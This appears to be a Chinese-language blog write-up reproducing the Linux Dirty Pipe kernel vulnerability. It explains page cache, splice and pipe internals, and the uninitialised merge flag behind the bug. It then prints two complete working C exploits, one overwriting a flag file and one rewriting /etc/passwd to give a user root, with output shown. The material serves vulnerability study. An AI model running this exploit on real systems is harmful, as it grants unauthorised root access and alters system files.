Kernel 现实漏洞复现：Dirty Pipe

Dirty Pipe 漏洞成因

攻击者可以利用该漏洞实现低权限用户提升至 root 权限，且能对主机任意可读文件进行读写

攻击适用版本：

Linux Kernel版本 >= 5.8
Linux Kernel版本 < 5.16.11 / 5.15.25 / 5.10.102

攻击适用条件：

攻击者必须有读权限（因为它需要通过 splice 方法将将页输入管道中）
偏移量不能在页边界上（因为页上至少有一个字节已经拼接到管道中）
写入不能跨越页边界（因为这将为其余部分创建一个新的匿名缓冲区）
文件无法调整大小（因为管道有自己的页面填充管理，并且不会告诉页面缓存附加了多少数据）
单次写入的长度不能超过一页（因为页大小为4K）

该漏洞源于新管道缓冲区结构的“flag”变量在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确的初始化

前置知识 - Page Cache & splice

Page Cache 即缓存管理机制，一般当我们访问一个磁盘文件的时候，首先内核会将其内容装载到 Page Cache 内存中，后续都是直接读取内存中的 Page Cache 来访问数据，内核会在合适的时机将标脏的 Page 给写回磁盘中

如果用户进程使用 read/write 读写文件，那么内核会先将载入数据的物理内存映射到内核虚拟内存 buffer，然后再将内核的 buffer 数据拷贝到用户态
如果追求效率，内核也提供一种零拷贝模式（不发生系统调用，跨越用户和内核的边界做上下文切换），用户进程可以使用 mmap 直接将用户态的 buffer 映射到物理内存，不需要进行系统调用，直接访问自己的 mmap 区域即可访问到那段物理内存内容

splice 系统调用通过一种“零拷贝”的方法将文件内容输送到管道之中，相比传统的直接将文件内容送入管道性能更好

经典的 read/write 方式：利用用户态数据 buf 作为文件缓存

1
2
3

buf = malloc(len)  		// 首先申请一块长度为len的内存
read(fd1, buf, len)  	// 将第一个文件fd1中len长度的数据读入buf
write(fd2, buf, len) 	// 将buf中的数据写入文件fd2中

零拷贝 splice：在数据发送的过程中，不需要在用户态为数据申请 buf，也就是不会产生用户态、内核态之间的数据拷贝

1 2	ssize_t splice(int fd_in, loff_t off_in, int fd_out, loff_t off_out, size_t len, unsigned int flags);

在两个文件描述符之间移动数据，而无需在内核地址空间和用户地址空间之间进行复制
它从文件描述中传输最多 len 字节的数据
将 fd_in 传递到文件描述符 fd_out，其中文件描述符之一必须引用管道

splice 在内核中对应的接口如下：

SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in,
		int, fd_out, loff_t __user *, off_out,
		size_t, len, unsigned int, flags)
{
	struct fd in, out;
	long error;

	if (unlikely(!len))
		return 0;

	if (unlikely(flags & ~SPLICE_F_ALL))
		return -EINVAL;

	error = -EBADF;
	in = fdget(fd_in); /* 找到输入文件 */
	if (in.file) {
		out = fdget(fd_out); /* 找到输出文件 */
		if (out.file) {
			error = do_splice(in.file, off_in, out.file, off_out,
					  len, flags); /* 真正的移动数据 */
			fdput(out);
		}
		fdput(in);
	}
	return error;
}

调用链如下：

sys_splice -> do_splice -> []
[pipe to pipe]-> splice_pipe_to_pipe -> ()
[pipe to file]-> do_splice_to -> ()
[file to pipe]-> do_splice_from -> f_op->splice_read(generic_file_splice_read) -> call_read_iter -> f_op->read_iter(copy_folio_to_iter) -> ... -> copy_page_to_iter -> copy_page_to_iter_pipe

其中 copy_page_to_iter_pipe 对“flag”变量没有进行初始化

使用 splice 将数据从文件导入到管道中：（file to pipe）

首先将数据加载到文件页面缓存 page cache 中
然后创建一个管道缓冲区 pipe_buffer
直接 pipe_buffer->page = page cache，把 page cache 当做 pipe_buffer 的缓存页

如果此时该管道还想存储从其他输入流传输来的数据，就只能重新申请 pipe_buffer，不能直接附加到刚才的 pipe_buffer 中，因为该 page 是文件的缓存页面，不属于管道，但 Dirty Pipe 利用了一种方法使该页面可以被管道写入

前置知识 - Pipe

管道 Pipe 是一种经典的 IPC 通信方式：

它包含一个输入端和一个输出端，程序将数据从一段输入，从另一端读出
在内核中，为了实现这种数据通信，需要以页面 Page 为单位维护一个环形缓冲区（被称为 ring_buffer），里面存了16个 pipe_buffer 结构，每个 pipe_buffer 结构又有一个指针指向一个表示物理内存页 Page 的结构体

struct pipe_buffer {
	struct page *page; /* 用于描述一个物理页 */
	unsigned int offset, len; 
	const struct pipe_buf_operations *ops; /* 对应操作管道的函数指针 */
	unsigned int flags;
	unsigned long private;
};

每个 Page 大小为 4KB，页面之间并不连续
管道维护两个引用计数器，一个用来写 (pipe->head)，一个用来读 (pipe->tail)，可以被循环利用
当前页面带有 PIPE_BUF_FLAG_CAN_MERGE flag 时，如果将标记且续写后的数据长度不超过一页时，则可以进行续写

管道描述符 pipe_inode_info，用于表示一个管道，存储管道相应的信息：

struct pipe_inode_info {
	struct mutex mutex;
	wait_queue_head_t rd_wait, wr_wait;
	unsigned int head; /* 缓冲区生成点 */
	unsigned int tail; /* 缓冲区消耗点 */
	unsigned int max_usage;
	unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
	bool note_loss;
#endif
	unsigned int nr_accounted;
	unsigned int readers; /* 该管道的当前读者数量(每次以读方式打开时,readers加1,关闭时readers减1) */
	unsigned int writers; /* 该管道的当前写者数量(每次以写方式打开时,writers加1,关闭时writers减1) */
	unsigned int files; /* 引用此管道的file结构体数量 */
	unsigned int r_counter; /* 管道读者记数器,每次以读方式打开管道时,r_counter加1,关闭是不变 */
	unsigned int w_counter; /* 管道写者计数器,每次以写方式打开管道时,w_counter加1,关闭是不变 */
	struct page *tmp_page; /* 页缓存,可以加速页帧的分配过程,当释放页帧时将页帧记入tmp_page,当分配页帧时,优先从tmp_page中获取(如果tmp_page为空才从伙伴系统中获取) */
	struct fasync_struct *fasync_readers; /* 读端异步描述符 */
	struct fasync_struct *fasync_writers; /* 写端异步描述符 */
	struct pipe_buffer *bufs; /* 回环缓冲区(由16个pipe_buffer对象组成,每个pipe_buffer对象拥有一个内存页) */
	struct user_struct *user; /* 创建此管道的用户 */
#ifdef CONFIG_WATCH_QUEUE
	struct watch_queue *watch_queue;
#endif
};

管道可以分为命名管道和匿名管道：

命名管道是一个有名字的实体文件
匿名管道就是我们常使用的管道符创建的管道

本质上来讲，管道就是一种进程间的通信手段，让两个进程可以通过 pipe 发送和接收数据（匿名管道可用于父子与兄弟进程之间的通信，有名管道则用于两个无关进程的通信）

这里我们重点分析实现管道写的函数 pipe_write：

装载了文件缓存页面 page tcache 的 pipe_buffer 不能被该管道续写（因为写入该管道的数据将会被写入文件）
我们来看一下究竟是哪里限制了管道的写入：

static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
	struct file *filp = iocb->ki_filp;
	struct pipe_inode_info *pipe = filp->private_data;
	unsigned int head;
	ssize_t ret = 0;
	size_t total_len = iov_iter_count(from);
	ssize_t chars;
	bool was_empty = false;
	bool wake_next_writer = false;

	if (unlikely(total_len == 0))
		return 0;

	__pipe_lock(pipe);

	if (!pipe->readers) {
		send_sig(SIGPIPE, current, 0);
		ret = -EPIPE;
		goto out;
	}

#ifdef CONFIG_WATCH_QUEUE
	if (pipe->watch_queue) {
		ret = -EXDEV;
		goto out;
	}
#endif

	head = pipe->head; /* 获取缓冲区生成点(用于写入) */
	was_empty = pipe_empty(head, pipe->tail); /* 检查管道是否为空 */ 
	chars = total_len & (PAGE_SIZE-1);
	if (chars && !was_empty) { /* 缓存页不为空 */
		unsigned int mask = pipe->ring_size - 1;
		struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask]; /* 通过head索引到对应的pipe_buffer */
		int offset = buf->offset + buf->len; 

        /* 如果flag为PIPE_BUF_FLAG_CAN_MERGE则允许在当前页面续写 */
		if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
		    offset + chars <= PAGE_SIZE) {
  
			ret = pipe_buf_confirm(pipe, buf); /* 检查是否写跨页 */
			if (ret)
				goto out; /* 会引发写跨页(分配一个新的内存页来装数据) */

			ret = copy_page_from_iter(buf->page, offset, chars, from); /* 将数据从用户传来的from,拷贝到pipe_buf->page */
			if (unlikely(ret < chars)) {
				ret = -EFAULT;
				goto out;
			}

			buf->len += ret;
			if (!iov_iter_count(from))
				goto out;
		}
	}
    
    ......
    
out:
	if (pipe_full(pipe->head, pipe->tail, pipe->max_usage))
		wake_next_writer = false;
	__pipe_unlock(pipe);

	if (was_empty) {
		wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
		kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
	}
	if (wake_next_writer)
		wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
	if (ret > 0 && sb_start_write_trylock(file_inode(filp)->i_sb)) {
		int err = file_update_time(filp);
		if (err)
			ret = err;
		sb_end_write(file_inode(filp)->i_sb);
	}
	return ret;
}

重点注意该函数对 PIPE_BUF_FLAG_CAN_MERGE 的处理，如果 flag 中有该标志位，就会调用 copy_page_from_iter 函数将数据复制到管道缓冲区

Dirty Pipe 漏洞利用

对于能否将数据附加至一个管道缓冲区，内核采用了如下的机制：

Linux 2.6.16 以前，pipe_buf_operations 结构有一个单独的 flag 叫做 can_merge，下面这行 if 语句通过则允许在当前页面续写

1	if (ops->can_merge && offset + chars <= PAGE_SIZE) {

Linux 2.6.16 起，为了支持 splice 调用，引入了 page_cache_pipe_buf_ops，它实际上是一个设置了 can_merge=0 的 pipe_buf_operations，用来指示这部分页不能被管道写入

static const struct pipe_buf_operations page_cache_pipe_buf_ops = {
	.can_merge = 0,
	.map = generic_pipe_buf_map,
	.unmap = generic_pipe_buf_unmap,
	.confirm = page_cache_pipe_buf_confirm,
	.release = page_cache_pipe_buf_release,
	.steal = page_cache_pipe_buf_steal,
	.get = generic_pipe_buf_get,
};

Linux 5.0 中，由于只有一种管道缓冲区类型可以追加新数据，对 can_merge 的检查被修改为只检查类型是否是 anon_pipe_buf_ops（这就是那个唯一可追加内容的类型）

1	if (pipe_buf_can_merge(buf) && offset + chars <= PAGE_SIZE) {

1
2
3

static bool pipe_buf_can_merge(struct pipe_buffer *buf) {
    return buf->ops == &anon_pipe_buf_ops;
}

Linux 5.8 中又将 pipe_buf_operations 类型的比较修改为 pipe_buffer的一个 flag：PIPE_BUF_FLAG_CAN_MERGE

1 2	if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) && offset + chars <= PAGE_SIZE) {

Linux 4.9 添加了两个新函数 copy_page_to_iter_pipe 和 push_pipe ，它们分配了新的管道缓冲区，但并没有初始化 flag（当时 flag 的作用并不大）

Linux 5.8 对 flag 有所运用，没有初始化 flag，意味着之前遗留下来的 PIPE_BUF_FLAG_CAN_MERGE 标志位不会被 splice 系统调用清空，这可能会影响后续某些函数的执行流程

漏洞利用的思路为：

创建管道
用任意数据填充管道（为整个缓冲区环结构设置 PIPE_BUF_FLAG_CAN_MERGE 标记）
清空管道（保留 pipe_inode_info 环中每一个缓冲区的 flag ）
使用 splice 将目标文件（以只读方式打开）中的数据从目标偏移之前的位置放入到管道中
将任意数据写入管道，此数据将覆盖缓存的文件页面，而不是创建新的匿名缓冲区

伪代码如下：

pipe(p);

/* 完全填充管道,每个pipe_buffer现在将拥PIPE_BUF_FLAG_CAN_MERGE flag */
for (r = pipe_size ; r > 0 ; ){ 
    n = r > sizeof(buffer) ? sizeof(buffer) : r;
    write(p[1], buffer, n);   
    r -= n
}

/* 排空管道,释放所有pipe_buffer实例(但是保留标志初始化) */
for (r = pipe_size; r > 0;) {
    n = r > sizeof(buffer) ? sizeof(buffer) : r;
    read(p[0], buffer, n);
    r -= n;
}

fd = open("target", O_RDONLY); 
--offset;
splice(fd, &offset, p[1], NULL, 1, 0); /* 将指定偏移量之前的一个字节拼接到管道,这将添加对页面缓存的引用,但PIPE_BUF_FLAG_CAN_MERGE的状态依然有效 */

write(p[1], data, data_size); /* 不会创建新的pipe_buffer,而是会写入页面缓存 */

调用 splice 函数可以通过“零拷贝”的形式将文件发送到 pipe（代码层面的零拷贝是直接将文件缓存页 page cache 作为 pipe 的缓存页使用）
但这里引入了一个变量未初始化漏洞，导致文件缓存页会在后续 pipe 通道中被当成普通 pipe 缓存页而被“续写”进而被篡改
然而，在这种情况下，因为没有其他可写权限的程序进行 write 操作，所以内核并不会将这个缓存页判定为“脏页”，短时间内(到下次重启之类的)不会刷新到磁盘
在这段时间内所有访问该文件的场景都将使用被篡改的文件缓存页，也就达成了一个“短时间内对任意可读文件任意写”的操作

Dirty Pipe 漏洞复现

1.修改服务器上 flag 文件的值：

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
 
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
 
static void prepare_pipe(int p[2])
{
        if (pipe(p)) abort();
 
        const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
        static char buffer[4096];
 
        for (unsigned r = pipe_size; r > 0;) {
                unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
                write(p[1], buffer, n);
                r -= n;
        }
 
        for (unsigned r = pipe_size; r > 0;) {
                unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
                read(p[0], buffer, n);
                r -= n;
        }
}
 
int main(int argc, char **argv) {
        const char *const path = "flag";
 
 
        loff_t offset = 1;
        const char *const data = "lag{pipeeee}"; 
        const size_t data_size = strlen(data);
        if (offset % PAGE_SIZE == 0) {
                fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
                return EXIT_FAILURE;
        }
 
        const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
        const loff_t end_offset = offset + (loff_t)data_size;

        if (end_offset > next_page) {
                fprintf(stderr, "Sorry, cannot write across a page boundary\n");
                return EXIT_FAILURE;
        }

        const int fd = open(path, O_RDONLY); 
        if (fd < 0) {
                perror("open failed");
                return EXIT_FAILURE;
        }
 
        struct stat st;
        if (fstat(fd, &st)) {
                perror("stat failed");
                return EXIT_FAILURE;
        }else{
                printf("st.st_size:0x%lx\n",st.st_size);
        }
 
        if (offset > st.st_size) {
                fprintf(stderr, "Offset is not inside the file\n");
                return EXIT_FAILURE;
        }
 
        if (end_offset > st.st_size) {
                fprintf(stderr, "Sorry, cannot enlarge the file\n");
                return EXIT_FAILURE;
        }

        int p[2];
        prepare_pipe(p);

        --offset;
        ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
        if (nbytes < 0) {
                perror("splice failed");
                return EXIT_FAILURE;
        }
        if (nbytes == 0) {
                fprintf(stderr, "short splice\n");
                return EXIT_FAILURE;
        }
 
        nbytes = write(p[1], data, data_size);
        if (nbytes < 0) {
                perror("write failed");
                return EXIT_FAILURE;
        }
        if ((size_t)nbytes < data_size) {
                fprintf(stderr, "short write\n");
                return EXIT_FAILURE;
        }
        
        return EXIT_SUCCESS;
}

结果如下：

/ $ cat flag
flag{yhellow}
/ $ ./exp
st.st_size:0xe
/ $ cat flag
flag{pipeeee}

2.修改 /etc/passwd 中用户的 uid 和组 id 来实现提权：

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
 
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
 
static void prepare_pipe(int p[2])
{
        if (pipe(p)) abort();
 
        const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
        static char buffer[4096];
 
        for (unsigned r = pipe_size; r > 0;) {
                unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
                write(p[1], buffer, n);
                r -= n;
        }
 
        for (unsigned r = pipe_size; r > 0;) {
                unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
                read(p[0], buffer, n);
                r -= n;
        }
}
 
int main(int argc, char **argv) {
        const char *const path = "/etc/passwd";

        loff_t offset = 30;
        const char *const data = "test:x:0:0:,,,,,,,,,,,,,,,:/root:/bin/sh"; 
        const size_t data_size = strlen(data);
        if (offset % PAGE_SIZE == 0) {
                fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
                return EXIT_FAILURE;
        }
 
        const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
        const loff_t end_offset = offset + (loff_t)data_size;

        if (end_offset > next_page) {
                fprintf(stderr, "Sorry, cannot write across a page boundary\n");
                return EXIT_FAILURE;
        }
 
        const int fd = open(path, O_RDONLY); 
        if (fd < 0) {
                perror("open failed");
                return EXIT_FAILURE;
        }
 
        struct stat st;
        if (fstat(fd, &st)) {
                perror("stat failed");
                return EXIT_FAILURE;
        }else{
                printf("st.st_size:0x%lx\n",st.st_size);
        }
 
        if (offset > st.st_size) {
                fprintf(stderr, "Offset is not inside the file\n");
                return EXIT_FAILURE;
        }
 
        if (end_offset > st.st_size) {
                fprintf(stderr, "Sorry, cannot enlarge the file\n");
                return EXIT_FAILURE;
        }

        int p[2];
        prepare_pipe(p);

        --offset;
        ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
        if (nbytes < 0) {
                perror("splice failed");
                return EXIT_FAILURE;
        }
        if (nbytes == 0) {
                fprintf(stderr, "short splice\n");
                return EXIT_FAILURE;
        }
 
        nbytes = write(p[1], data, data_size);
        if (nbytes < 0) {
                perror("write failed");
                return EXIT_FAILURE;
        }
        if ((size_t)nbytes < data_size) {
                fprintf(stderr, "short write\n");
                return EXIT_FAILURE;
        }
        
        return EXIT_SUCCESS;
}

因为 su 命令需要 root 权限，所以在 root 用户中进行测试
结果如下：

/ # cat /etc/passwd 
root:x:0:0:root:/root:/bin/sh
test:x:1000:1000:note:/home/test:/bin/sh
/ # ./exp
st.st_size:0x47
/ # cat /etc/passwd 
root:x:0:0:root:/root:/bin/sh
test:x:0:0:,,,,,,,,,,,,,,,:/root:/bin/sh
/ # su test
/ # whoami
root
/ # id
uid=0(root) gid=0 groups=0

切换到 test 用户以后，还是显示 root 权限

参考：